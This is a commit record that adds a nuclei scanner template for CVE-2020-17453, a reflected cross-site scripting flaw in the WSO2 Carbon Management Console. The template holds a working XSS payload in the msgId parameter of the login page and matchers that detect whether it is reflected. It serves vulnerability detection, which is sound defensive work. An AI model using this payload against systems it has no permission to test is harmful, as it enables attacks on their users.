Merge pull request #1140 from Mad-robot/master

Create CVE-2020-17453.yaml
2021-03-24 22:47:08 +05:30 · 2021-03-24 22:47:08 +05:30 · 08a9e85ed4
parent 87c6bf8b93 8b4c8b8549
commit 08a9e85ed4
1 changed files with 30 additions and 0 deletions
--- a/cves/2020/CVE-2020-17453.yaml
+++ b/cves/2020/CVE-2020-17453.yaml
@ -0,0 +1,30 @@
+id: CVE-2020-17453
+
+info:
+  name: WSO2 Carbon Management Console - XSS
+  author: madrobot
+  severity: medium
+  description: Reflected XSS vulnerability can be exploited by tampering a request parameter in Management Console. This can be performed in both authenticated and unauthenticated requests.
+  tags: xss,wso2,cve2020,cve
+  reference: https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2020-1132
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/carbon/admin/login.jsp?msgId=%27%3Balert(%27nuclei%27)%2F%2F'
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "'';alert('nuclei')//';"
+        part: body
+
+      - type: word
+        words:
+          - "text/html"
+        part: header